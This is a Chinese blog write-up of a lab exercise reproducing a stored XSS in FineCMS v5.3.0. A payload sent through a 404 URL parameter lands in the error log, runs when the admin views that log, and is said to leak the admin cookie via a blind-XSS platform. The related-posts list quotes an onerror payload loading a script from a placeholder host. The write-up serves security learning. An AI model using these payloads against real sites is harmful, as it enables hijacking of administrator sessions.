[zkaq靶场]FineCMS的存储型XSS

最新推荐文章于 2024-01-08 15:43:15 发布
最新推荐文章于 2024-01-08 15:43:15 发布
阅读量1.4k 收藏 6
点赞数 3
分类专栏: zkaq靶场 文章标签: CMS xss 存储型xss finecms 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42633229/article/details/116567705
版权

Fine CMS 存储型xss漏洞

本地测试

安装(版本v5.3.0)

tip:这个cms需要安装在网站根目录,不能安装在子目录

然后访问install.php开始安装。

image-20210326192523387

image-20210326192547689

完成安装,访问后台。默认账户密码:admin/admin。

网站后台:提供错误日志查看功能。
image-20210326194749043

在错误日志页面,我们可以看到错误日志的存放位置:WWW/cache/errorlog/log-2021-03-26.php

image-20210326200228223

我们可以查看一下这个文件,然后输入一些内容测试一下。

在该文件的最后一行加入了测试内容

image-20210326200500337

可以发现,后台的错误日志多了一行。

我们判定,错误日志的内容读取的就是errorlog文件夹下的文件,且没有过滤。

image-20210326200526523

那么,根据推理,如果我们可以控制错误日志的文件内容,在错误日志里写入xss,那么当管理员登录后台查看错误日志时就会触发xss。

那么哪里可以将内容写入错误日志呢?

经过代码审计发现:

finecms\system\core\Codelgniter.php下的show_404方法是罪祸首,它调用了log_message()方法,log_message()调用write_log()方法,write_log()方法创建日志文件并写入错误信息。

上述过程中没有对错误信息过滤。

我们只需要通过show_404方法产生错误信息就可将错误信息写入日志文件。

访问不存在的方法或对象,出现404错误。就会触发show_404方法。

image-20210326202743028

image-20210326202757686

c和m是固定的参数名。

hello跟world是不存在的对象.

那么就可以在这里输入我们的payload。

c=hello&m=world<script>alert(1)</script>

image-20210326202956415

管理员后台查看错误日志时:

image-20210326203028436

存储型xss被触发。

然后利用xss盲打平台即可获取管理员cookie。

wwxxee
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
FineCMS任意头像上传漏洞复现:文件的四次上传
Miracle_ze的博客
08-16 1387
1、第一次绕过代码没有文件再次检测,采用传包含文件夹的压缩包绕过或使用时间竞争漏洞绕过2、第二个绕过代码添加了递归对文件夹再次检测,但由于没有间竞争漏洞绕过问题。使用间竞争漏洞绕过3、第三次绕过代码进行随机命名文件无法猜文件名间竞争漏洞绕过失效,但是可以采用解压一半报错保存php文件4、第四次绕过代码对报错保留的文件进行了递归删除,但是我们可以欺骗系统将解码的文件判定为上级目录文件规避了递归在当前目录下是所有检测。其实这种漏洞补一处出现处,要从根本解决。.........
FineCMS公益版整合2.2和5.0.8
07-06
最新的整合版本,2系列的最终版是2.2
FineCMS公益版 v2.0.1
12-01
FineCMS公益版(简称版或公益版)是一款基于PHP+MySql+CI框架开发的高效简洁的中小内容管理系统,面向多终端包括Pc端网页和移动端网页,支持自定义内容模和会员模,并且可
FineCMS 内容管理系统 v5.2.0 bulid1204
11-26
FineCMS(简称版或公益版)是一款基于PHP+MySql+CI框架开发的高效简洁的中小内容管理系统,面向多终端包括Pc端网页和移动端网页,支持自定义内容模和会员模,并且可以自定
finecms-XSS(cve-2017-11629)
最新发布
m0_65150886的博客
01-08 740
dayrui FineCms 5.0.10及之前的版本中的controllers/api.php文件存在跨站脚本漏洞。远程攻击者可借助c=api&m=data2请求中的‘function’参数利用该漏洞注入任意的Web脚本或HTML。Dayrui FineCms是中国天睿(Dayrui)程序设计团队发布的一套使用MVC架构和PDO数据库接口开发的内容管理系统(CMS)。借此漏洞,攻击者可以窃取用户Cookie;2.对输入和URL参数进行过滤(白名单和黑名单)1.访问http://ip:port,进入首页。
【漏洞学习——XSSfineCMS免费版xss+getshell
Fly_鹏程万里
02-22 1758
漏洞细节 注册一个用户,在发表文章的地方发表文章 在编辑器里加入一张图片 用firebug修改图片地址 加入onerror属性 onerror=document.body.appendChild(document.createElement('script')).src='//xxx.xxx/a.js' 因为发表的文章需要后台管理员审核的,当管理员审核的时候触发漏洞 然后是getsh...
finecms的csrf漏洞(CVE-2018-18191)
FODKING的博客
12-10 3658
原理 CSRF(Cross-site request forgery)跨站请求伪造:通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。 尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。 与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性 你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。 CSRF能够做的事情包括:以
XSS注入(存储)---zkaq
weixin_38237216的博客
04-02 222
1.访问靶场 靶场cmsFine CMS,版本是v5.3.0 2.寻找CMS已知漏洞,尝试攻击 网上搜索已知的Fine CMSXSS漏洞利用信息 参考网站:https://www.freebuf.com/column/165269.html 漏洞根因:简而言之,该cms会将错误日志写入文件,但是写入过程中没有对错误信息过滤,直接写入了文件。然后该cms后台提供错误日志查看功能,错误日志信息直接读取上述文件,当管理员在后台查看错误日志时,程序从文件中读取日志信息。所以攻击点在于控制错误日志的信息。当
[zkaq靶场]XSS--存储XSS
wwxxee
05-09 393
存储XSS 靶场 靶场cmsFine CMS,其版本为v5.3.0。 搜索该cms的漏洞。 参考:https://www.jianshu.com/p/200ea62486d9 简单来说就是,该cms会将错误日志写入文件,但是写入过程中没有对错误信息过滤,直接写入了文件。然后该cms后台提供错误日志查看功能,错误日志信息直接读取上述文件,当管理员在后台查看错误日志时,程序从文件中读取日志信息。所以攻击点在于控制错误日志的信息。 当错误日志写入文件的信息可控时,管理员在后台查看错误日志,就可以触发xs
存储XSS—漏洞
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-25 967
存储XSS—漏洞 原理:嵌入到web页面的恶意HTML会被存储到应用服务器端,例如你注册时候将用户昵称设置为XSS恶意代码,那么访问某些页面会显示用户名的时候就会触发恶意代码 我们先进入靶场 很明显它是一个CMS,我们第一反应就是有没有通杀啊 百度搜索 我们先在本地搭建一个FineCMS 搭建好过后,我们查看百度上找到了通杀漏洞文章 找到URL栏上的数据,我们提取出来 index.php?c=mail&m=test 尝试在本地搭建的进行测试 查看后台错误日志 成功得到执行,接着我们进入Xss平台
finecms aip.php漏洞,FineCMS漏洞挖掘
weixin_32494599的博客
03-11 520
0x00 背景最近在挖掘FineCMS源码的漏洞,发现了一些有趣的洞,斗哥计划先从配置文件写入开始分析,然后再结合存储XSS进行GetShell,本篇先分析配置文件写入的问题,下周再分析存储XSS的问题,最终通过这两类洞的组合利用GetShell,大体思路流程很简单,但是代码分析中有蛮多技巧,期待与师傅们的交流讨论。0x01 漏洞审计1x00 相关环境源码信息:FineCMS v5.3.0 bul...
FineCMS使用手册
07-02
FineCMS(简称FC)是一款基于PHP+MySql开发的内容管理系统,采用MVC设计模式实现业务逻辑与表现层的适当分离,使网页设计师能够轻松 设计出理想的模板, 插件化方式开发功能易用便于扩展,支持自定义内容模和会员模,并且可以自定义字段,可面向中小站点提供重量级网站建设解决方案
FineCMS 内容管理系统 v5.3.0 bulid20180206
11-07
FineCMS(简称版或公益版)是一款基于PHP+MySql+CI框架开发的高效简洁的中小内容管理系统,面向多终端包括Pc端网页和移动端网页,支持自定义内容模和会员模,并且可以自定
最新版完全开源免费好用的FineCMS
11-09
FineCMS免费版是一款基于PHP+MySql+CI框架开发的高效简洁的中小内容管理系统,面向多终端包括Pc端网页和移动端网页,支持自定义内容模和会员模,并且可以自定义字段,可面向中小站点提供重量级网站建设解决方案,适用于小站点、企业级网站、新闻内容网站等,个人站长及中小企业的首选建站系统。
FineCMS企业网站管理系统(企业版)php版v2016.12.12
08-03
FineCMS企业网站管理系统(简称免费版或企业版)是一款基于PHP MySql CI框架开发的高效简洁的中小内容管理系统,面向多终端包括Pc端网页和移动端网页,支持自定义内容模和会员模,并且可以自定义字段,可面向中小站点提供重量级网站建设解决方案,适用于小站点、企业级网站、新闻内容网站等,个人站长及中小企业的首选建站系统。 免费开源 FineCMS企业网站管理系统将永久真正的免费并彻底
FineCMS.rar_finecms
09-23
在提供的“FineCMS.rar_finecms”压缩包中,包含的是FineCMS的1.9.10版本,这是一个经过测试并被认为运行正常的版本。这个版本可能修复了之前版本的一些已知问题,提升了系统的稳定性和安全性。 FineCMS的设计理念...
FineCMS v5.0.4
11-30
FineCMS v5.0.4 是一款在IT行业中备受瞩目的开源内容管理系统,它基于强大的PHP编程语言,利用MySql作为数据库存储,并采用了CodeIgniter(CI)框架进行开发。此系统的最新版本5.0.4,以其高效、简洁的特性,为中...
FineCMS v5.0.7
11-30
在网络安全日益重要的今天,FineCMS v5.0.7 也注重系统的安全性,通过严谨的代码审计、数据加密、权限控制等措施,有效防止SQL注入、XSS攻击等常见安全问题,确保网站的稳定运行。 7. 后台管理界面: 系统后台...
FineCMS v5.0.10
11-29
首先,让我们深入了解FineCMS的架构基础。CI框架以其轻量级、快速和易于理解的特点被广大开发者所青睐。FineCMS利用CI的组件化设计,使得系统模块化,方便代码管理和维护。此外,CI的MVC模式(Model-View-Controller...
finecms逻辑漏洞
06-06
FineCMS是一款开源的内容管理系统,它的逻辑漏洞可能会导致安全问题。以下是FineCMS常见的逻辑漏洞: 1.未经身份验证的访问:FineCMS的某些页面没有进行身份验证,可能会通过直接访问URL来绕过身份验证机制,获取敏感信息或执行特权操作。 2.输入验证不足:FineCMS的某些输入字段没有进行足够的验证,可能会导致SQL注入、跨站点脚本攻击等安全问题。 3.弱密码策略:FineCMS的默认密码策略较弱,可能会导致用户密码被猜测或破解,进而导致系统被攻击。 4.文件上传漏洞:FineCMS的文件上传功能可能存在漏洞,攻击者可以上传恶意文件,导致系统被攻击。 5.逻辑错误:FineCMS的某些功能可能存在逻辑错误,攻击者可以通过利用这些错误来执行特权操作或获取敏感信息。 总之,为了减少FineCMS的逻辑漏洞,建议及时更新最新版本,加强安全策略,进行安全测试和漏洞扫描。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值